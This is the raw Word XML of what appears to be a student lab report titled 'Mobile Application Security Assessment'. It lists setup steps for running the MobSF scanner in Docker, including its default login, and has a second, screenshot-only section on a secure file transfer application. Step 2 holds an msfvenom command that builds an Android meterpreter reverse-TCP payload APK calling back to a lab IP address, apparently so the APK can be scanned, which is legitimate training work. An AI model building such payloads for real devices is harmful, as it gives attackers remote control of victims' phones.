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7305" w:rsidRDefault="00F87305" w:rsidP="00F87305">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="TitleChar"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F87305">
        <w:rPr>
          <w:rStyle w:val="TitleChar"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Mobile Application Security Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003609BF" w:rsidRDefault="00B71CA9" w:rsidP="00F87305">
      <w:r>
        <w:t>1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71CA9" w:rsidRDefault="00B71CA9">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B71CA9">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B71CA9">
        <w:t xml:space="preserve"> apt update &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B71CA9">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B71CA9">
        <w:t xml:space="preserve"> apt upgrade-y</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71CA9" w:rsidRDefault="00B71CA9">
      <w:r w:rsidRPr="00B71CA9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4816EA45" wp14:editId="7223E1DF">
            <wp:extent cx="5731510" cy="25774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A9" w:rsidRDefault="00B71CA9">
      <w:r>
        <w:t>2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71CA9" w:rsidRDefault="00B71CA9" w:rsidP="00B71CA9">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B71CA9">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B71CA9">
        <w:t xml:space="preserve"> -p android/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B71CA9">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B71CA9">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B71CA9">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B71CA9">
        <w:t xml:space="preserve"> LHOST=192.168.89.128 LPORT=5555 -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B71CA9">
        <w:t>my_payload.apk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00B71CA9" w:rsidRDefault="00B71CA9" w:rsidP="00B71CA9">
      <w:r w:rsidRPr="00B71CA9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B03D711" wp14:editId="0EA6222D">
            <wp:extent cx="5731510" cy="9029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A9" w:rsidRDefault="00B71CA9" w:rsidP="00B71CA9">
      <w:r>
        <w:t>3)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71CA9" w:rsidRDefault="00B71CA9" w:rsidP="00B71CA9">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B71CA9">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B71CA9">
        <w:t xml:space="preserve"> apt install docker.io -y  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71CA9" w:rsidRDefault="00B71CA9" w:rsidP="00B71CA9">
      <w:r w:rsidRPr="00B71CA9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D1B6488" wp14:editId="5863F475">
            <wp:extent cx="5731510" cy="7829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A9" w:rsidRDefault="00B71CA9" w:rsidP="00B71CA9">
      <w:r>
        <w:t>4)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71CA9" w:rsidRDefault="00B71CA9" w:rsidP="00B71CA9">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B71CA9">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B71CA9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B71CA9">
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B71CA9">
        <w:t xml:space="preserve"> enable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B71CA9">
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00B71CA9" w:rsidRDefault="00B71CA9" w:rsidP="00B71CA9">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B71CA9">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B71CA9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B71CA9">
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B71CA9">
        <w:t xml:space="preserve"> start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B71CA9">
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00B71CA9" w:rsidRDefault="00B71CA9" w:rsidP="00B71CA9">
      <w:r w:rsidRPr="00B71CA9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DE50FD3" wp14:editId="240186B4">
            <wp:extent cx="5731510" cy="12795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A9" w:rsidRDefault="00983EF9" w:rsidP="00B71CA9">
      <w:r>
        <w:t>5)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00983EF9" w:rsidRDefault="00983EF9" w:rsidP="00B71CA9">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00983EF9">
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00983EF9">
        <w:t xml:space="preserve"> --version   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00983EF9" w:rsidRDefault="00983EF9" w:rsidP="00B71CA9">
      <w:r w:rsidRPr="00983EF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BE36617" wp14:editId="490AB0E9">
            <wp:extent cx="5624047" cy="632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F9" w:rsidRDefault="00983EF9" w:rsidP="00B71CA9"/>
    <w:p w:rsidR="00312069" w:rsidRDefault="00312069" w:rsidP="00B71CA9">
      <w:r>
        <w:t>6)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00312069" w:rsidRDefault="00312069" w:rsidP="00B71CA9">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00312069">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00312069">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00312069">
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00312069">
        <w:t xml:space="preserve"> run -it --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00312069">
        <w:t>rm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00312069">
        <w:t xml:space="preserve"> -p 8000:8000 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00312069">
        <w:t>opensecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00312069">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00312069">
        <w:t>mobile-security-framework-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00312069">
        <w:t>mobsf:latest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00312069">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00312069" w:rsidRDefault="00312069" w:rsidP="00B71CA9">
      <w:r w:rsidRPr="00312069">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BCDBBEE" wp14:editId="0076F41E">
            <wp:extent cx="5731510" cy="33699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69" w:rsidRDefault="007F3B88" w:rsidP="00B71CA9">
      <w:r>
        <w:t>7)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00272BCE" w:rsidRDefault="00C57FEB" w:rsidP="00B71CA9">
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00EA0CFD" w:rsidRPr="00D80A5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://127.0.0.1:8000/login/?next=/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00EA0CFD" w:rsidRDefault="00EA0CFD" w:rsidP="00B71CA9"/>
    <w:p w:rsidR="007F3B88" w:rsidRDefault="00272BCE" w:rsidP="00B71CA9">
      <w:r w:rsidRPr="00272BCE">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B63EA95" wp14:editId="4B612DD7">
            <wp:extent cx="5731510" cy="27355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FD" w:rsidRDefault="00EA0CFD" w:rsidP="00B71CA9">
      <w:r w:rsidRPr="00EA0CFD">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="628219D5" wp14:editId="32922267">
            <wp:extent cx="5731510" cy="26752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FD" w:rsidRDefault="00EA0CFD" w:rsidP="00B71CA9">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Username:mobsf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pass:mobsf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00970BDC" w:rsidRDefault="00970BDC" w:rsidP="00B71CA9"/>
    <w:p w:rsidR="00970BDC" w:rsidRDefault="00970BDC" w:rsidP="00B71CA9">
      <w:r>
        <w:t>8)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00970BDC" w:rsidRDefault="00970BDC" w:rsidP="00B71CA9">
      <w:r w:rsidRPr="00970BDC">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EC75C86" wp14:editId="080E387A">
            <wp:extent cx="5731510" cy="28721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DC" w:rsidRDefault="00970BDC" w:rsidP="00B71CA9">
      <w:r>
        <w:t>9)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00970BDC" w:rsidRDefault="002932E6" w:rsidP="00B71CA9">
      <w:r w:rsidRPr="002932E6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C28C5F0" wp14:editId="49176926">
            <wp:extent cx="5731510" cy="31222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2E6" w:rsidRDefault="002932E6" w:rsidP="00B71CA9">
      <w:r>
        <w:t>10)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F87305" w:rsidRDefault="004D0475" w:rsidP="00B71CA9">
      <w:r w:rsidRPr="004D0475">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62E66163" wp14:editId="0449B911">
            <wp:extent cx="5731510" cy="2842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B71CA9"/>
    <w:p w:rsidR="00F87305" w:rsidRDefault="00F87305" w:rsidP="00F87305">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F87305">
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Secure File Transfer Application</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F87305" w:rsidRDefault="00F87305" w:rsidP="00F87305">
      <w:r>
        <w:t>1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D5F18" w:rsidRDefault="005D5F18" w:rsidP="00F87305">
      <w:r w:rsidRPr="005D5F18">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F180A90" wp14:editId="5FDF0205">
            <wp:extent cx="5731510" cy="32213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18" w:rsidRDefault="005D5F18" w:rsidP="00F87305">
      <w:r>
        <w:t>2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573C94" w:rsidRDefault="00573C94" w:rsidP="00F87305">
      <w:r w:rsidRPr="00573C94">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F7629AC" wp14:editId="3A9D5F24">
            <wp:extent cx="5731510" cy="322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94" w:rsidRDefault="00573C94" w:rsidP="00F87305">
      <w:r>
        <w:t>3)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C1408" w:rsidRDefault="008C1408" w:rsidP="00F87305">
      <w:r w:rsidRPr="008C1408">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A7F2F5B" wp14:editId="6C20C0AE">
            <wp:extent cx="5731510" cy="32213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08" w:rsidRDefault="008C1408" w:rsidP="00F87305">
      <w:r>
        <w:t>4)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F70D1" w:rsidRDefault="006F70D1" w:rsidP="00F87305">
      <w:r w:rsidRPr="006F70D1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E7C417D" wp14:editId="4C3D1C37">
            <wp:extent cx="5731510" cy="32213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0D1" w:rsidRDefault="006F70D1" w:rsidP="00F87305">
      <w:r>
        <w:t>5)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC197B" w:rsidRDefault="00BC197B" w:rsidP="00F87305">
      <w:r w:rsidRPr="00BC197B">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7695F5DA" wp14:editId="74E3EB10">
            <wp:extent cx="5731510" cy="3221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97B" w:rsidRDefault="00BC197B" w:rsidP="00F87305">
      <w:r>
        <w:t>6)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002932E6" w:rsidRPr="00F87305" w:rsidRDefault="00C57FEB" w:rsidP="00F87305">
      <w:r w:rsidRPr="00C57FEB">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03DCE106" wp14:editId="547AB02A">
            <wp:extent cx="5731510" cy="27590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F87305" w:rsidRPr="00F87305">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D0475" w:rsidRPr="00B71CA9" w:rsidRDefault="004D0475" w:rsidP="00B71CA9"/>
    <w:sectPr w:rsidR="004D0475" w:rsidRPr="00B71C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764"/>
    <w:rsid w:val="00272BCE"/>
    <w:rsid w:val="002932E6"/>
    <w:rsid w:val="00312069"/>
    <w:rsid w:val="003609BF"/>
    <w:rsid w:val="00473764"/>
    <w:rsid w:val="004D0475"/>
    <w:rsid w:val="00573C94"/>
    <w:rsid w:val="005D5F18"/>
    <w:rsid w:val="006F70D1"/>
    <w:rsid w:val="007F3B88"/>
    <w:rsid w:val="008C1408"/>
    <w:rsid w:val="00970BDC"/>
    <w:rsid w:val="00983EF9"/>
    <w:rsid w:val="00B71CA9"/>
    <w:rsid w:val="00BC197B"/>
    <w:rsid w:val="00C57FEB"/>
    <w:rsid w:val="00EA0CFD"/>
    <w:rsid w:val="00F87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CADE4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8B4403DD-90FA-43C5-A940-FE505C859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0CFD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873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730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hyperlink" Target="http://127.0.0.1:8000/login/?next=/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8</Pages>
  <Words>93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Nabeel Hassan</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Nabeel Hassan</cp:lastModifiedBy>
  <cp:revision>24</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-31T07:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-20T06:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>